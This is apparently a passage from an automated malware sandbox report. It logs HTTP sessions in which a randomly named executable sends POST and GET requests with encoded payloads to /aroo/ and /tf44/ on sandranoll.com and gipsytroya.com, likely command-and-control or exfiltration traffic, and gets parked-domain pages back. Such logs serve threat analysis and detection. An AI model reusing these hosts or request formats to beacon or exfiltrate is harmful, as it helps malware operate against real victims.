                      Data Raw: 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 0d 0a 62 62 39 0d 0a 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 [TRUNCATED]
                      Data Ascii: ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>bb9Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitu
                      Jul 2, 2024 07:17:53.832453012 CEST224INData Raw: 6e 67 65 6e 20 65 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65
                      Data Ascii: ngen einrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">
                      Jul 2, 2024 07:17:53.832463026 CEST1236INData Raw: 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 44 61 73 20 4d 6f 64 75 6c 20 44 61 74 65 6e 62 61 6e 6b 65 6e 20 69 6d 20 44 6f 6d 61 69 6e 74 65 63 68 6e
                      Data Ascii: <table><tr><td><table><tr><td colspan="2"><h2>Das Modul Datenbanken im Domaintechnik&reg; Hosting Control Panel</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmi
                      Jul 2, 2024 07:17:53.832684040 CEST791INData Raw: 68 3a 33 30 30 70 78 3b 22 3e 6f 77 6e 43 6c 6f 75 64 20 2d 20 44 69 65 20 6b 6f 73 74 65 6e 6c 6f 73 65 20 4f 6e 6c 69 6e 65 2d 53 70 65 69 63 68 65 72 6c 26 6f 75 6d 6c 3b 73 75 6e 67 20 66 26 75 75 6d 6c 3b 72 20 49 68 72 20 57 65 62 68 6f 73
                      Data Ascii: h:300px;">ownCloud - Die kostenlose Online-Speicherl&ouml;sung f&uuml;r Ihr Webhosting. Bereits ab dem g&uuml;nstigen Paket Profi-Server Start.</td></tr></table></td><td><table><tr><td colspan="2"><h2>Contao CMS Hosting</h2></td></tr><tr><td s
                      Jul 2, 2024 07:17:53.835338116 CEST5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      30192.168.2.549742213.145.228.16806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:55.674478054 CEST801OUTPOST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 228
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 34 33 77 53 65 4c 30 46 7a 49 69 6d 51 64 6e 78 71 47 62 74 77 76 57 4b 46 75 6d 48 4a 69 4e 58 53 36 69 63 30 38 47 55 58 36 56 52 44 34 30 32 76 6c 44 68 41 6d 41 66 57 4f 48 57 6c 34 41 6b 42 48 67 54 6c 46 31 61 36 50 64 55 33 78 75 44 45 30 33 37 44 32 78 4f 67 51 56 74 4b 4a 7a 6a 4a 6a 30 6a 46 50 43 66 33 4b 63 63 6b 39 55 55 63 6c 6e 48 50 4a 31 38 5a 73 2f 76 31 65 36 79 50 53 53 4e 65 31 6c 62 6c 65 63 75 77 70 41 79 2b 48 50 42 7a 6d 57 2f 45 6d 2f 77 49 2f 65 68 53 56 53 58 67 42 66 59 51 55 37 4b 42 33 67 58 30 57 4a
                      Data Ascii: 66s0QHx=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b43wSeL0FzIimQdnxqGbtwvWKFumHJiNXS6ic08GUX6VRD402vlDhAmAfWOHWl4AkBHgTlF1a6PdU3xuDE037D2xOgQVtKJzjJj0jFPCf3Kcck9UUclnHPJ18Zs/v1e6yPSSNe1lblecuwpAy+HPBzmW/Em/wI/ehSVSXgBfYQU7KB3gX0WJ
                      Jul 2, 2024 07:17:56.395361900 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:56 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 34 39 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                      Data Ascii: 49a<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                      Jul 2, 2024 07:17:56.395380974 CEST224INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                      Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes">8a5
                      Jul 2, 2024 07:17:56.395389080 CEST1236INData Raw: 0a 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 3e 3c 74 61 62 6c 65 3e 3c 74 72 3e 3c 74 64 20 63 6f 6c 73 70 61 6e 3d 22 32 22 3e 3c 68 32 3e 67 65 74 53 69 6d 70 6c 65 20 43 4d 53 20 48 6f 73 74 69 6e 67 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72
                      Data Ascii: <table><tr><td><table><tr><td colspan="2"><h2>getSimple CMS Hosting</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/get_simple_logo_klei
                      Jul 2, 2024 07:17:56.395613909 CEST980INData Raw: 70 78 3b 22 3e 57 69 72 20 73 69 6e 64 20 49 43 41 4e 4e 20 61 6b 6b 72 65 64 69 74 69 65 72 74 65 72 20 44 6f 6d 61 69 6e 20 52 65 67 69 73 74 72 61 72 20 20 75 6e 64 20 57 65 62 20 48 6f 73 74 69 6e 67 20 50 72 6f 76 69 64 65 72 20 6d 69 74 20
                      Data Ascii: px;">Wir sind ICANN akkreditierter Domain Registrar und Web Hosting Provider mit eigener Infrastruktur in &Ouml;sterreich, auf dessen Qualit&auml;tsdienstleistungen Sie sich verlassen k&ouml;nnen.</td></tr></table></td><td><table><tr><td cols
                      Jul 2, 2024 07:17:56.398175001 CEST5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      31192.168.2.549743213.145.228.16806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:17:58.216372013 CEST1818OUTPOST /aroo/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.sandranoll.com
                      Origin: http://www.sandranoll.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 1244
                      Referer: http://www.sandranoll.com/aroo/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 57 49 61 62 47 6c 56 58 6e 34 6c 32 75 50 35 47 61 2f 47 38 66 4a 73 31 50 70 4d 37 47 78 78 78 31 7a 45 44 36 46 67 38 62 37 58 77 53 73 7a 30 47 55 63 69 6e 51 64 6e 38 4b 47 65 74 77 76 4c 4b 45 4b 71 48 4a 2f 32 58 51 79 69 65 58 6b 47 46 56 43 56 4c 54 34 30 2b 50 6c 47 73 67 6d 76 66 57 65 44 57 6c 6f 41 6b 42 48 67 54 6d 64 31 63 72 50 64 53 33 78 74 41 45 30 7a 78 6a 32 56 4f 67 35 75 74 4b 4e 4a 67 39 76 30 6a 6c 2f 43 64 68 65 63 42 55 39 57 5a 38 6c 2f 48 50 45 79 38 5a 41 64 76 32 43 63 79 49 2b 53 4d 62 34 76 42 32 57 2f 34 47 68 68 2b 73 36 7a 47 6e 4b 4d 79 55 6d 79 79 4b 62 4d 69 44 4a 46 53 31 56 42 51 30 64 48 58 57 71 30 53 53 48 44 71 62 46 63 41 73 4a 36 78 54 6c 59 34 57 31 4d 4e 35 71 35 6d 47 53 54 77 72 37 44 42 6b 73 79 66 6e 62 6d 68 76 6a 54 4a 38 79 75 52 70 4e 52 7a 48 65 6e 57 42 76 53 63 2b 36 56 42 66 42 54 69 4a 38 59 4c 58 6c 34 4f 51 30 73 63 4b 4b 73 52 6d 79 6d 79 34 37 42 7a 75 4f 6e 52 57 66 35 61 4f 35 4b 39 5a 67 6d 50 44 31 53 46 64 [TRUNCATED]
                      Data Ascii: 66s0QHx=WIabGlVXn4l2uP5Ga/G8fJs1PpM7Gxxx1zED6Fg8b7XwSsz0GUcinQdn8KGetwvLKEKqHJ/2XQyieXkGFVCVLT40+PlGsgmvfWeDWloAkBHgTmd1crPdS3xtAE0zxj2VOg5utKNJg9v0jl/CdhecBU9WZ8l/HPEy8ZAdv2CcyI+SMb4vB2W/4Ghh+s6zGnKMyUmyyKbMiDJFS1VBQ0dHXWq0SSHDqbFcAsJ6xTlY4W1MN5q5mGSTwr7DBksyfnbmhvjTJ8yuRpNRzHenWBvSc+6VBfBTiJ8YLXl4OQ0scKKsRmymy47BzuOnRWf5aO5K9ZgmPD1SFdN0ZqyUQqYT9GNbIwsmn4qhVMJ/xREOF8U66xQaAKQ1NzV3tahO7/OkVTB/3FV1zxXYBAvHrnV3MiOZ4HU2WX6bQ/LHYzsPK834zJFKsMHUZRzJ6YPNIdqwVF8IbMsFInPOxcV2G4uo1QZBPCNSGAFOUFfV4HstABjgsezxaDiSY9JK+tLFqE4+3l+sXXMyeKDFgSmUCFJMjIftSUcsckEyX6ucOchIoYu/iq5Nux2l3cZnnHUKAszgSVgaSr5MsMMUc+c4UD+qbYzO0vCj3KbrbYBm/Lkr2rkk6ia8EMgJ7jTwGw7TyX22Y9OB3ARnByyUBtKgcbScVXZ5NAzKXEBe5nJyhf12HCLvnGGpxqwwc9Lps4jztSj4TN+8SppKY+tv9vWJzN3fqjULcsWdPhRmdrIfSrg8Ucpnt9GHdEtcJSmbpLo5F92yIqzdb2JFPje/jSL4ZOpGtnVZNOeMyED6jo9ZZ5A422aVqy5Z50hY4N3A+i4EkPb2Oq3Cxk1hBP2I5UNkaIk6AIK4g/5LoYgCoR7LHXzFa8A31N5eHhpZgGxKZCbHoydjwKlMXlJBySw7y99DkwdkN0TifYz609ttdOefsXieuHsrM7YUEC7Ah5cX9VeTnje3LN0DxxbRVU56eGOGwv1mIXtHpNWNDz7kndwDbKkVwMg2 [TRUNCATED]
                      Jul 2, 2024 07:17:58.912574053 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:17:58 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 64 32 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                      Data Ascii: d28<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                      Jul 2, 2024 07:17:58.912674904 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                      Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                      Jul 2, 2024 07:17:58.912687063 CEST1174INData Raw: 65 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 52 65 73 65 6c 6c 65 72 21 3c 2f 68 32 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63
                      Data Ascii: e Domaintechnik.at Reseller!</h2></td></tr><tr><td style="width:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/redirect.png" alt="Reseller" /></td><td style="width:300px;">A
                      Jul 2, 2024 07:17:58.915380001 CEST5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      32192.168.2.549744213.145.228.16806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:00.747570038 CEST524OUTGET /aroo/?Jjv=GpKhRVSHzLA8j4R&66s0QHx=bKy7FSIHmKYFjPoPKsunUN9vBLYaDX52twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGB3kb0OJ7ghG7VUOTSl8sxinDCxUKcrHKEU0DEmNR7hjgMQ== HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Host: www.sandranoll.com
                      Connection: close
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Jul 2, 2024 07:18:01.447443962 CEST1236INHTTP/1.1 404 Not Found
                      Date: Tue, 02 Jul 2024 05:18:01 GMT
                      Server: Apache/2.4.56 (Debian)
                      X-Powered-By: PHP/7.4.33
                      Strict-Transport-Security: max-age=63072000; preload
                      Connection: Upgrade, close
                      Transfer-Encoding: chunked
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 63 65 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 [TRUNCATED]
                      Data Ascii: ce9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xmlns="http://www.w3.org/1999/xhtml"><head> <title>Domain www.sandranoll.com is registered by Domaintechnik</title> <meta http-equiv="content-type" content="application/xhtml+xml; charset=UTF-8" /> <meta http-equiv="content-language" content="en" /> <link rel="stylesheet" href="css/styles.css" /></head><body> <div id="parking_page_header"> <div id="parking_page_header_inner"><img src="http://www.domaintechnik.at/data/gfx/dt_logo_parking.png" alt="Domaintechnik.at Logo" /></div> </div> <div id="content"> <h1>The Domain www.sandranoll.com is registered!</h1> <p style="padding:20px 0 10px 0;font-size:1.2em;" class="align-center">Als Domaininhaber k&ouml;nnen Sie Ihre Domains online verwalten, Inhaberdaten aktualisieren, <br />Domainweiterleitungen e
                      Jul 2, 2024 07:18:01.447515011 CEST1236INData Raw: 69 6e 72 69 63 68 74 65 6e 2c 20 57 65 62 68 6f 73 74 69 6e 67 20 62 65 73 74 65 6c 6c 65 6e 20 75 6e 64 20 56 69 65 6c 65 73 20 6d 65 68 72 2e 3c 62 72 20 2f 3e 45 62 65 6e 73 6f 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 6f 6e 6c 69 6e
                      Data Ascii: inrichten, Webhosting bestellen und Vieles mehr.<br />Ebenso k&ouml;nnen Sie online neue Domains registrieren und bei Bedarf ein Web Hosting Paket, auch Webspace genannt, bestellen.</p> <div id="parking_boxes"><table><tr><td><table><tr
                      Jul 2, 2024 07:18:01.447526932 CEST1111INData Raw: 74 68 3a 31 30 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 22 3e 3c 69 6d 67 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65
                      Data Ascii: th:100px;text-align:center;"><img style="display:block;" src="https://www.domaintechnik.at/fileadmin/gfx/icons/free-basic-hosting.png" alt="Gratis Basis Hosting" /></td><td style="width:300px;">Gratis Basis Hosting f&uuml;r jede Domain bei Dom
                      Jul 2, 2024 07:18:01.450016975 CEST5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      33192.168.2.54974591.195.240.19806600C:\Program Files (x86)\HNlYSctsxjusxqYQrESGhmOEfHJwtjndFahIKSrGDsdYtbZtOyTREdo\sSzWYtHqcRqHklFYcPzKpLlSXP.exe
                      TimestampBytes transferredDirectionData
                      Jul 2, 2024 07:18:06.490978956 CEST781OUTPOST /tf44/ HTTP/1.1
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Accept-Language: en-us
                      Accept-Encoding: gzip, deflate, br
                      Host: www.gipsytroya.com
                      Origin: http://www.gipsytroya.com
                      Cache-Control: max-age=0
                      Connection: close
                      Content-Type: application/x-www-form-urlencoded
                      Content-Length: 208
                      Referer: http://www.gipsytroya.com/tf44/
                      User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
                      Data Raw: 36 36 73 30 51 48 78 3d 2b 46 4b 67 62 50 42 6e 79 56 6f 6b 37 6c 2f 32 47 70 41 55 34 73 54 41 75 68 36 59 41 37 77 46 6f 6e 4a 54 76 38 6f 59 51 47 65 36 58 43 4e 4e 6b 34 4e 58 4a 33 32 59 45 4b 4d 36 46 57 54 69 64 68 43 34 58 4d 64 47 76 2f 5a 77 37 68 6b 37 35 49 2f 4b 32 76 76 7a 45 65 59 46 42 35 6e 51 48 78 4b 50 6c 45 41 36 45 31 69 30 66 32 4e 66 48 69 53 49 71 44 59 58 38 63 69 4f 48 6a 2f 36 52 54 61 53 64 39 67 67 42 54 30 71 4f 39 56 4d 6d 73 31 39 66 64 4a 43 58 38 67 39 68 72 75 63 50 49 4f 52 71 75 38 49 4d 54 53 62 79 62 36 52 68 54 44 39 45 31 67 56 34 2f 51 75 44 77 45 65 48 57 7a 36 50 39 34 3d
                      Data Ascii: 66s0QHx=+FKgbPBnyVok7l/2GpAU4sTAuh6YA7wFonJTv8oYQGe6XCNNk4NXJ32YEKM6FWTidhC4XMdGv/Zw7hk75I/K2vvzEeYFB5nQHxKPlEA6E1i0f2NfHiSIqDYX8ciOHj/6RTaSd9ggBT0qO9VMms19fdJCX8g9hrucPIORqu8IMTSbyb6RhTD9E1gV4/QuDwEeHWz6P94=
                      Jul 2, 2024 07:18:07.127055883 CEST707INHTTP/1.1 405 Not Allowed
                      date: Tue, 02 Jul 2024 05:18:07 GMT
                      content-type: text/html
                      content-length: 556
                      server: Parking/1.0
                      connection: close
